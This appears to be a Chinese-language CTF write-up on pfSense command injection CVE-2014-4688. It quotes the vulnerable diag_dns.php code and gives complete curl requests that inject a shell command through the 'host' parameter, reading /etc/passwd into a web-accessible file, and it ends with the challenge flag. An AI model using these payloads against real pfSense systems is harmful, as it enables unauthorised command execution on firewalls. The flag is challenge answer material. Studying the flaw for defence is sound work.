0x0 漏洞信息

  • pfsense是一个开源的商业化防火墙,历史悠久,用户众多
  • cve编号为:CVE-2014-4688,参考链接
  • 网上关于这个漏洞的解释都含含糊糊,甚至都没测试就发出来了
  • 本文基于真实环境安装测试

0x1 漏洞成因

  • 利用提供的iso完成安装,提取出目标页面
  • diag_dns.php
/* Cheap hack to support both $_GET and $_POST */
if ($_GET['host'])
$_POST = $_GET;

if($_GET['createalias'] == "true") {
$host = trim($_POST['host']);
if($_GET['override'])
$override = true;
$a_aliases = &$config['aliases']['alias'];
$type = "hostname";
$resolved = gethostbyname($host);
if($resolved) {
$host = trim($_POST['host']);
$dig=`dig "$host" A | grep "$host" | grep -v ";" | awk '{ print 5 }'`;
  • 这里的$_POST['host']直接传递给dig xxx执行,属于命令注入

0x2 漏洞利用

  1. 首先在chrome中按照标准使用一遍这个功能

    image-20220228141955472.png

  2. 这时候通过bp或者curl来模拟/拦截请求

    curl 'http://1.2.3.4:8080/diag_dns.php' \
  -H 'Connection: keep-alive' \
  -H 'Pragma: no-cache' \
  -H 'Cache-Control: no-cache' \
  -H 'Origin: http://1.2.3.4:8080' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'DNT: 1' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://1.2.3.4:8080/diag_dns.php' \
  -H 'Accept-Language: zh-CN,zh;q=0.9' \
  -H 'Cookie: PHPSESSID=4889d81a3982b9cbc565fd8fcef16cb8; cookie_test=1646032654' \
  --data-raw '__csrf_magic=sid%3A55d48fa80daf46be0b8606e5993831c8dec87612%2C1646029064&host=1.2.3.4&Submit=DNS+Lookup' \
  --compressed \
  --insecure

  3. 紧接着,增加get路径,并且对host参数进行注入,核心参数如下

    1. curl 'http://1.2.3.4:8080/diag_dns.php?createalias=true'
    2. &host=1";md5 /etc/passwd >pick.txt;&

  4. 修改后的请求如下

    curl 'http://1.2.3.4:8080/diag_dns.php?createalias=true' \
  -H 'Connection: keep-alive' \
  -H 'Pragma: no-cache' \
  -H 'Cache-Control: no-cache' \
  -H 'Origin: http://1.2.3.4:8080' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'DNT: 1' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://1.2.3.4:8080/diag_dns.php' \
  -H 'Accept-Language: zh-CN,zh;q=0.9' \
  -H 'Cookie: PHPSESSID=4889d81a3982b9cbc565fd8fcef16cb8; cookie_test=1646032654' \
  --data-raw '__csrf_magic=sid%3A55d48fa80daf46be0b8606e5993831c8dec87612%2C1646029064&host=1";md5 /etc/passwd >pick.txt;&Submit=DNS+Lookup' \
  --compressed \
  --insecure

  5. 最后通过浏览器访问pick.txt就可以获得命令执行的结果

    image-20220228142417302.png

  6. 根据题目要求flag为:flag{0ca0c0336fc307ab3d7fcc3e33590d41}
Last modification:June 8, 2022
© Reprint prohibited
如果觉得我的文章对你有用,请随意赞赏